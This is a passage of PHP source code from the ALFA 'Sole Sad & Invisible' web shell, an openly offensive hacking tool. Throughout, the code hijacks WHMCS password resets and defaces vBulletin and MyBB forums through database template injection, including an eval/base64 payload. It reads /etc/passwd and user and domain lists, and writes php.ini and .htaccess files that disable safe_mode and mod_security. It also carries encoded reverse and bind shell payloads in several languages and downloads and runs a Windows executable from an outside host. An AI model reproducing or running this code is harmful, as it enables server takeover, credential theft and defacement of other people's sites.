3798$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
3799$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
3800$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
3801$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
3802if(function_exists('curl_version')){
3803$AlfaSole = new AlfaCURL(true);
3804$saveurl = $AlfaSole->Send($path."/pwreset.php");
3805$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
3806$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
3807$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
3808$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
3809__alert('File Created...');
3810echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
3811}else{
3812echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
3813}}}}
3814if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
3815echo __pre();
3816
3817echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
3818<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
3819";
3820$table = array('td1' =>
3821 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3822 'td2' =>
3823 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3824 'td3' =>
3825 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3826 'td4' =>
3827 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
3828 'td5' =>
3829 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
3830);
3831create_table($table);
3832echo "<br><div class='txtfont'>| Your Index |</div><br>
3833<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3834<input type='submit' value=' '></form></center></center>";
3835if($_POST['alfa8']=='>>'){
3836$s0levisible="Powered By Solevisible";
3837$dbu = $_POST['alfa2'];
3838$dbn = $_POST['alfa3'];
3839$dbp = $_POST['alfa4'];
3840$dbh = $_POST['alfa5'];
3841$index = $_POST['alfa6'];
3842$prefix = $_POST['alfa7'];
3843$index=str_replace("\'","'",$index);
3844$set_index = "{\${eval(base64_decode(\'";
3845$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
3846$set_index .= "\'))}}{\${exit()}}";
3847if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3848$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3849$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
3850$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
3851$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
3852@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
3853@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
3854@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
3855__alert('VB index changed...!');
3856}
3857}
3858}
3859if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
3860echo __pre();
3861
3862echo "<center><center><div class='txtfont_header'>| Mybb |</div>
3863<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
3864";
3865$table = array('td1' =>
3866 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3867 'td2' =>
3868 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3869 'td3' =>
3870 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3871 'td4' =>
3872 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3873);
3874create_table($table);
3875echo "<br><div class='txtfont'>| Your Index |</div><br>
3876<textarea name=mybbindex rows='19' cols='103'>
3877<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
3878if(isset($_POST['alfa6'])){
3879$mybb_dbh = $_POST['alfa6'];
3880$mybb_dbu = $_POST['alfa7'];
3881$mybb_dbn = $_POST['alfa8'];
3882$mybb_dbp = $_POST['alfa9'];
3883$mybb_index = $_POST['alfa10'];
3884if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
3885$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
3886$prefix="mybb_";
3887$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
3888$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
3889__alert('MyBB index changed...!');
3890}
3891}
3892}
3893echo "</div>";
3894alfafooter();
3895}
3896function alfaproc()
3897{
3898alfahead();
3899echo "<Div class=header><br><center>";
3900if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
3901$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3902if($GLOBALS['sys']=="win"){
3903$process=array(
3904"Task List" =>"tasklist /V",
3905"System Info" =>"systeminfo",
3906"Active Connections" => "netstat -an",
3907"Running Services" => "net start",
3908"User Accounts" => "net user",
3909"Show Computers" => "net view",
3910"ARP Table" => "arp -a",
3911"IP Configuration" => "ipconfig /all"
3912);}else{
3913$process=array(
3914"Process status" => "ps aux",
3915"Syslog" =>"cat /etc/syslog.conf",
3916"Resolv" => "cat /etc/resolv.conf",
3917"Hosts" =>"cat /etc/hosts",
3918"Cpuinfo"=>"cat /proc/cpuinfo",
3919"Version"=>"cat /proc/version",
3920"Sbin"=>"ls -al /usr/sbin",
3921"Interrupts"=>"cat /proc/interrupts",
3922"lsattr"=>"lsattr -va",
3923"Uptime"=>"uptime",
3924"Fstab" =>"cat /etc/fstab"
3925);}
3926foreach($process as $n => $link){
3927echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
3928}
3929echo "</center><br>";
3930if(!empty($_POST['alfa1'])){
3931echo "<pre class='ml1' style='margin-top:5px' >";
3932if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
3933echo alfaEx($cmd.$_POST['alfa1']);
3934echo '</pre>';
3935}
3936echo "</div>";
3937alfafooter();
3938}
3939function alfasafe(){
3940alfahead();
3941echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
3942echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
3943if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
3944if(!_alfa_file_exists("/etc/virtual/domainowners")){
3945echo __pre();
3946$solevisible9 = _alfa_file('/etc/named.conf');
3947if(is_array($solevisible9)){
3948foreach($solevisible9 as $solevisible13){
3949if(@eregi('zone',$solevisible13)){
3950preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3951if(strlen(trim($solevisible14[1][0])) > 2){
3952echo $solevisible14[1][0].'<br>';
3953}}}
3954}
3955}else{
3956echo __pre();
3957$users = _alfa_file("/etc/virtual/domainowners");
3958if(is_array($users)){
3959foreach($users as $boz){
3960$dom = explode(":",$boz);
3961echo $dom[0]."\n";}}}}
3962if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
3963echo '
3964<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
3965if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
3966if(!_alfa_file_exists("/etc/virtual/domainowners")){
3967$site = trim($_POST['alfa7']);
3968$rep = str_replace(array("https://","http://","www."),"",$site);
3969$user = "";
3970if(function_exists("posix_getpwuid") && function_exists("fileowner")){
3971 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
3972 $user = $user['name'];
3973 }
3974}else{
3975 if(_alfa_can_runCommand(true,true)){
3976 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
3977 }
3978}
3979if(!empty($user)&&$user!='root'){
3980echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
3981}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
3982}else{
3983$site = trim($_POST['alfa7']);
3984$rep = str_replace(array("https://","http://","www."),"",$site);
3985$users = _alfa_file("/etc/virtual/domainowners");
3986foreach($users as $boz){
3987$ex = explode(":",$boz);
3988if($ex[0] == $rep){
3989echo __pre()."<center><table border='1'>
3990<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
3991<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
3992if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
3993if(!_alfa_file_exists("/etc/virtual/domainowners")){
3994echo __pre();
3995$i = 0;
3996while ($i < 60000) {
3997$line = @posix_getpwuid($i);
3998if (!empty($line)) {
3999while (list ($key, $vl) = each($line)){
4000echo $vl."\n";
4001break;}}$i++;}
4002}else{echo __pre();
4003$users = _alfa_file("/etc/virtual/domainowners");
4004foreach($users as $boz){
4005$user = explode(":",$boz);
4006echo trim($user[1]).'<br>';}}}
4007if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
4008echo __pre();
4009if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
4010for($uid=0;$uid<60000;$uid++){
4011$ara = @posix_getpwuid($uid);
4012if(!empty($ara)){
4013while(list ($key, $val) = each($ara)){
4014echo "$val:";
4015}echo "\n";}}
4016}else{__alert('failed...');}}
4017if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
4018@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4019echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4020}
4021if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
4022@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4023echo '<center><b><big> php.ini created...!</center></b></big>';
4024}
4025if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
4026@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4027echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4028}
4029echo "<br></div>";
4030alfafooter();
4031}
4032function __get_resource($content){
4033return @gzinflate(__ZGVjb2Rlcg($content));
4034}
4035function __write_file($file, $content){
4036if($fh = @fopen($file, "wb")){
4037if(fwrite($fh, $content)!==false) return true;
4038}
4039return false;
4040}
4041function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
4042$res = "<font color='green'>[ Success...! ]</font>";
4043$err = "<font color='red'>[ Failed...! ]</font>";
4044if($evalOptions!="") $evalOptions = $evalOptions." ";
4045if($evalArguments!="") $evalArguments = " ".$evalArguments;
4046if($evalType=="c"){
4047$tmpdir = ALFA_TEMPDIR;
4048chdir($tmpdir);
4049if(is_writable($tmpdir)){
4050$uniq = substr(md5(time()),0,8);
4051$filename = $evalType.$uniq.".c";
4052$path = $filename;
4053if(__write_file($path, $evalCode)){
4054$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
4055$pathres = $filename.$ext;
4056$evalOptions = "-o ".$pathres." ".$evalOptions;
4057$cmd = "gcc ".$evalOptions.$path;
4058alfaEx($cmd);
4059if(is_file($pathres)){
4060if(chmod($pathres, 0755)){
4061$cmd = $pathres.$evalArguments;
4062alfaEx($cmd);
4063}else{$res = $err;}
4064unlink($pathres);
4065}else{$res = $err;}
4066unlink($path);
4067}else{$res = $err;}
4068}
4069return $res;
4070}elseif($evalType=="java"){
4071$tmpdir = ALFA_TEMPDIR;
4072chdir($tmpdir);
4073if(is_writable($tmpdir)){
4074if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
4075$classname = trim($r[1]);
4076$filename = $classname;
4077}else{
4078$uniq = substr(md5(time()),0,8);
4079$filename = $evalType.$uniq;
4080$evalCode = "class ".$filename." { ".$evalCode . " } ";
4081}
4082$path = $filename.".java";
4083if(__write_file($path, $evalCode)){
4084$cmd = "javac ".$evalOptions.$path;
4085alfaEx($cmd);
4086$pathres = $filename.".class";
4087if(is_file($pathres)){
4088if(chmod($pathres, 0755)){
4089$cmd = "java ".$filename.$evalArguments;
4090alfaEx($cmd);
4091}else{$res = $err;}
4092unlink($pathres);
4093}else{$res = $err;}
4094unlink($path);
4095}else{$res = $err;}
4096}
4097return $res;
4098}
4099return false;
4100}
4101function alfaconnect(){
4102alfahead();
4103$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4104$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4105$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4106$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4107$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4108$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4109$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4110echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4111echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4112<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4113$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
4114foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
4115echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4116if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
4117$lang = $_POST['alfa1'];
4118$ip = $_POST['alfa2'];
4119$port = $_POST['alfa3'];
4120$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
4121$tmpdir = ALFA_TEMPDIR;
4122$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
4123$allow = array('perl','ruby','python','node');
4124eval('$lan=$'.$lang.';');
4125if(in_array($lang,$allow)){
4126if(__write_file($name,__get_resource($lan))){
4127if(_alfa_can_runCommand(true,true)){
4128$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
4129$out = alfaEx("$lang $name $arg $os");
4130if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
4131echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4132}
4133}else{
4134echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4135}
4136}
4137if($lang=='java'||$lang=='c'){
4138$code = __get_resource($lan);
4139$out = nl2br(bcinit($lang, $code,'',''));
4140echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4141}
4142if($lang=='bcwin'){
4143$alfa = new AlfaCURL();
4144$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4145$tmpdir = ALFA_TEMPDIR;
4146$f = @fopen($tmpdir.'/bcwin.exe','w+');
4147@fwrite($f, $s);
4148@fclose($f);
4149$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
4150}
4151if($lang=='php'){
4152echo "<pre class=ml1 style='margin-top:5px'>";
4153$code = __get_resource($lan);
4154if($code!==false){
4155$code = "\$target = \"".$arg."\";\n".$code;
4156eval($code);
4157echo("<center><font color='green'>[ Finished...! ]</font></center>");
4158}
4159echo "</pre>";
4160}
4161}
